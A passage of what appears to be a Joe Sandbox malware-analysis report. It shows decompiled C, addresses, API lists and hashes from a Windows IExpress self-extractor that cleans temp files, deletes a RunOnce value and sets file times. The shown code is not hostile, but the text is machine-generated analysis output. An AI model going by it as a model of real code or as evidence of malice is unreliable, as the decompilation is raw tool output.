                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0x178a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x178a24 == 0 &&  *0x179a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00171781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    					if(( *0x179a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E001765E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00172390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0x178a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0x179a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00171FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x178a20 =  *0x178a20 & 0x00000000;
                                                                                                                                                                                                    				return E00176CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752c1
                                                                                                                                                                                                    0x001752c8
                                                                                                                                                                                                    0x001752cb
                                                                                                                                                                                                    0x001752cc
                                                                                                                                                                                                    0x001752d4
                                                                                                                                                                                                    0x001752d6
                                                                                                                                                                                                    0x001752d7
                                                                                                                                                                                                    0x001752de
                                                                                                                                                                                                    0x001752e0
                                                                                                                                                                                                    0x001752f2
                                                                                                                                                                                                    0x001752fa
                                                                                                                                                                                                    0x001752fa
                                                                                                                                                                                                    0x00175302
                                                                                                                                                                                                    0x00175305
                                                                                                                                                                                                    0x0017530c
                                                                                                                                                                                                    0x00175312
                                                                                                                                                                                                    0x00175316
                                                                                                                                                                                                    0x00175316
                                                                                                                                                                                                    0x00175317
                                                                                                                                                                                                    0x0017531c
                                                                                                                                                                                                    0x0017531f
                                                                                                                                                                                                    0x00175333
                                                                                                                                                                                                    0x00175345
                                                                                                                                                                                                    0x00175351
                                                                                                                                                                                                    0x00175359
                                                                                                                                                                                                    0x00175359
                                                                                                                                                                                                    0x00175363
                                                                                                                                                                                                    0x00175369
                                                                                                                                                                                                    0x0017536f
                                                                                                                                                                                                    0x00175374
                                                                                                                                                                                                    0x00175374
                                                                                                                                                                                                    0x00175381
                                                                                                                                                                                                    0x00175387
                                                                                                                                                                                                    0x00175387
                                                                                                                                                                                                    0x0017538f
                                                                                                                                                                                                    0x001753a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(033C7230,00000080,?,00000000), ref: 001752F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(033C7230), ref: 001752FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(033C7230,?,00000000), ref: 00175305
                                                                                                                                                                                                    • LocalFree.KERNEL32(033C7230), ref: 0017530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(001711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00175363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00175334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-2312194364
                                                                                                                                                                                                    • Opcode ID: 9d15bd2042702d2df3758a4b1327bd6097580ddbd7d1ee82269cb7531e13fbf8
                                                                                                                                                                                                    • Instruction ID: da014892ab2e22e953810bde680b92714f00b8ed3ec3126a536e34a4c3d49a0c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d15bd2042702d2df3758a4b1327bd6097580ddbd7d1ee82269cb7531e13fbf8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B21FD31941A14DBDB20AB24EC09B6937B5BB54791F448669F88E579B0CFF09DC8CB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00171FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0x178530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00171fee
                                                                                                                                                                                                    0x00172005
                                                                                                                                                                                                    0x0017200d
                                                                                                                                                                                                    0x00172017
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172020
                                                                                                                                                                                                    0x0017200d
                                                                                                                                                                                                    0x00172029

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0017538C,?,?,0017538C), ref: 00172005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0017538C,wextract_cleanup0,?,?,0017538C), ref: 00172017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0017538C,?,?,0017538C), ref: 00172020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 849931509-702805525
                                                                                                                                                                                                    • Opcode ID: 7db739ae8fe17884ff227a74272ecbe390e61b81f948a833d3b3c0365badfdbe
                                                                                                                                                                                                    • Instruction ID: cb56f06c9860b034175dd7b6b94e9a9b1b1beb693ae09a219d7ad98c937910f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7db739ae8fe17884ff227a74272ecbe390e61b81f948a833d3b3c0365badfdbe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E04F34594318BBDB219B90EC0EF5E7B79FB41745F500198F90CA0460EB715AD4D715
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00174CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0x1791d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00174E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00176CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _t32 - 1;
                                                                                                                                                                                                    					__eflags = _t35;
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t37 =  *0x178584; // 0x0
                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0x1791e4;
                                                                                                                                                                                                    						_t58 = 0x1791e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                    						_t59 = _t58 - 0x1791e5;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x1791e4;
                                                                                                                                                                                                    						_t30 = E00174702( &_v268, 0x1791e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t41 = E0017476D( &_v268, __eflags);
                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                    						_t30 = E00174980( &_v268, 0x8302); // executed
                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E001747E0( &_v268);
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x1793f4 =  *0x1793f4 + 1;
                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						_t54 = 0x1791e4;
                                                                                                                                                                                                    						_t63 = 0x1791e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t64 = _t63 - 0x1791e5;
                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x1791e4;
                                                                                                                                                                                                    						_t30 = E00174702( &_v268, 0x1791e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                    						_t30 = E00174C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00174B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                    					_t30 = E00174B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                    			}































                                                                                                                                                                                                    0x00174cd0
                                                                                                                                                                                                    0x00174cdb
                                                                                                                                                                                                    0x00174ce0
                                                                                                                                                                                                    0x00174ce2
                                                                                                                                                                                                    0x00174cee
                                                                                                                                                                                                    0x00174cf2
                                                                                                                                                                                                    0x00174d0e
                                                                                                                                                                                                    0x00174d0e
                                                                                                                                                                                                    0x00174d11
                                                                                                                                                                                                    0x00174e83
                                                                                                                                                                                                    0x00174e88
                                                                                                                                                                                                    0x00174e98
                                                                                                                                                                                                    0x00174e98
                                                                                                                                                                                                    0x00174d17
                                                                                                                                                                                                    0x00174d17
                                                                                                                                                                                                    0x00174d1a
                                                                                                                                                                                                    0x00174d2f
                                                                                                                                                                                                    0x00174d2f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d2f
                                                                                                                                                                                                    0x00174d1c
                                                                                                                                                                                                    0x00174d1c
                                                                                                                                                                                                    0x00174d1f
                                                                                                                                                                                                    0x00174dcb
                                                                                                                                                                                                    0x00174dd0
                                                                                                                                                                                                    0x00174dd2
                                                                                                                                                                                                    0x00174ddd
                                                                                                                                                                                                    0x00174ddd
                                                                                                                                                                                                    0x00174de3
                                                                                                                                                                                                    0x00174de8
                                                                                                                                                                                                    0x00174ded
                                                                                                                                                                                                    0x00174ded
                                                                                                                                                                                                    0x00174def
                                                                                                                                                                                                    0x00174df0
                                                                                                                                                                                                    0x00174df0
                                                                                                                                                                                                    0x00174df4
                                                                                                                                                                                                    0x00174df4
                                                                                                                                                                                                    0x00174df6
                                                                                                                                                                                                    0x00174df9
                                                                                                                                                                                                    0x00174dfc
                                                                                                                                                                                                    0x00174dfc
                                                                                                                                                                                                    0x00174dfe
                                                                                                                                                                                                    0x00174dff
                                                                                                                                                                                                    0x00174dff
                                                                                                                                                                                                    0x00174e03
                                                                                                                                                                                                    0x00174e08
                                                                                                                                                                                                    0x00174e0a
                                                                                                                                                                                                    0x00174e0f
                                                                                                                                                                                                    0x00174d03
                                                                                                                                                                                                    0x00174d03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d03
                                                                                                                                                                                                    0x00174e18
                                                                                                                                                                                                    0x00174e20
                                                                                                                                                                                                    0x00174e25
                                                                                                                                                                                                    0x00174e27
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174e33
                                                                                                                                                                                                    0x00174e38
                                                                                                                                                                                                    0x00174e3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174e40
                                                                                                                                                                                                    0x00174e51
                                                                                                                                                                                                    0x00174e56
                                                                                                                                                                                                    0x00174e5b
                                                                                                                                                                                                    0x00174e5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174e6a
                                                                                                                                                                                                    0x00174e6f
                                                                                                                                                                                                    0x00174e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174e77
                                                                                                                                                                                                    0x00174e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174e7d
                                                                                                                                                                                                    0x00174d25
                                                                                                                                                                                                    0x00174d25
                                                                                                                                                                                                    0x00174d28
                                                                                                                                                                                                    0x00174d36
                                                                                                                                                                                                    0x00174d3b
                                                                                                                                                                                                    0x00174d40
                                                                                                                                                                                                    0x00174d40
                                                                                                                                                                                                    0x00174d42
                                                                                                                                                                                                    0x00174d43
                                                                                                                                                                                                    0x00174d43
                                                                                                                                                                                                    0x00174d47
                                                                                                                                                                                                    0x00174d4a
                                                                                                                                                                                                    0x00174d4a
                                                                                                                                                                                                    0x00174d4c
                                                                                                                                                                                                    0x00174d4f
                                                                                                                                                                                                    0x00174d4f
                                                                                                                                                                                                    0x00174d51
                                                                                                                                                                                                    0x00174d52
                                                                                                                                                                                                    0x00174d52
                                                                                                                                                                                                    0x00174d56
                                                                                                                                                                                                    0x00174d5b
                                                                                                                                                                                                    0x00174d5d
                                                                                                                                                                                                    0x00174d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d67
                                                                                                                                                                                                    0x00174d6f
                                                                                                                                                                                                    0x00174d74
                                                                                                                                                                                                    0x00174d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d7c
                                                                                                                                                                                                    0x00174d84
                                                                                                                                                                                                    0x00174d89
                                                                                                                                                                                                    0x00174d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d94
                                                                                                                                                                                                    0x00174d99
                                                                                                                                                                                                    0x00174d9e
                                                                                                                                                                                                    0x00174da1
                                                                                                                                                                                                    0x00174daa
                                                                                                                                                                                                    0x00174daa
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174db5
                                                                                                                                                                                                    0x00174dbb
                                                                                                                                                                                                    0x00174dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174dc3
                                                                                                                                                                                                    0x00174dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174dc5
                                                                                                                                                                                                    0x00174dbd
                                                                                                                                                                                                    0x00174d2a
                                                                                                                                                                                                    0x00174d2a
                                                                                                                                                                                                    0x00174d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d2d
                                                                                                                                                                                                    0x00174cf8
                                                                                                                                                                                                    0x00174cfd
                                                                                                                                                                                                    0x00174d02
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00174DB5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00174DDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    • API String ID: 3625706803-2312194364
                                                                                                                                                                                                    • Opcode ID: 0dbb9821f3310e76a8d9fb498b8bb41c4be81350a6782508418370dc3b9755c2
                                                                                                                                                                                                    • Instruction ID: 22829e3761c393ed425a24dfa1adf3f039ebf1281f873a41ccb6858a659b3ea4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dbb9821f3310e76a8d9fb498b8bb41c4be81350a6782508418370dc3b9755c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B54120362001018BCB359FB8DE446F973B9AB65350B04C668E8CE976A1DF71DE8AC750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00174C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                    				struct _FILETIME _v20;
                                                                                                                                                                                                    				FILETIME* _t14;
                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __ecx * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t21 + 0x178d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t14 =  &_v12;
                                                                                                                                                                                                    					_t15 = SetFileTime( *(_t21 + 0x178d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00174c40
                                                                                                                                                                                                    0x00174c4a
                                                                                                                                                                                                    0x00174c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174c70
                                                                                                                                                                                                    0x00174c70
                                                                                                                                                                                                    0x00174c7e
                                                                                                                                                                                                    0x00174c86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174c8a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00174C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00174C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00174C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                    • Opcode ID: a94eafbfcdeaf1b777672393ac4d29509cb14211efb437749d692c58fbb8e255
                                                                                                                                                                                                    • Instruction ID: b70071991febc000dedd09febca5a306dc661fc945b430b9a39d754bb3e24b40
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a94eafbfcdeaf1b777672393ac4d29509cb14211efb437749d692c58fbb8e255
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0907264120CAFAB25DFB4CC48DBF77BCEB44350B84852AA82DC1050EB30D994C7A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E0017487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				CHAR* _t11;
                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                    				asm("sbb edi, edi");
                                                                                                                                                                                                    				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                    				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                    					asm("sbb esi, esi");
